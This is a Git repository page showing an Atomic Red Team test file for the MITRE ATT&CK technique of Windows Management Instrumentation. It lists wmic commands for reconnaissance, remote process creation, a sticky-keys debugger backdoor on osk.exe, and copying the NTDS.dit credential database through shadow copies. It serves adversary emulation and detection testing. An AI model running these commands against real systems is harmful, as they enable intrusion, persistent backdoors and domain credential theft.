security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
24412945ce0ad35cb9fb1ca2a2ddf7fc00a0bd00
atomic-red-team/Windows/Execution/Windows_Management_Instrumentation.md
T
caseysmithrc ac8dd2cfec Initial Commit 
Initial Checkin
2017-10-11 10:35:17 -07:00

46 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
## Windows Management Instrumentation
MITRE ATT&CK Technique: [T1047](https://attack.mitre.org/wiki/Technique/T1047)
### Reconnaissance
Input:
wmic useraccount get /ALL
Input:
wmic process get caption,executablepath,commandline
Input:
wmic qfe get description,installedOn /format:csv
Input:
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
Input:
get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
### Lateral Movement
Input:
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Input:
wmic /NODE: "192.168.0.1" process call create "evil.exe"
### Privileged Escalation
Input:
wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
Input:
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
Reference in New Issue View Git Blame Copy Permalink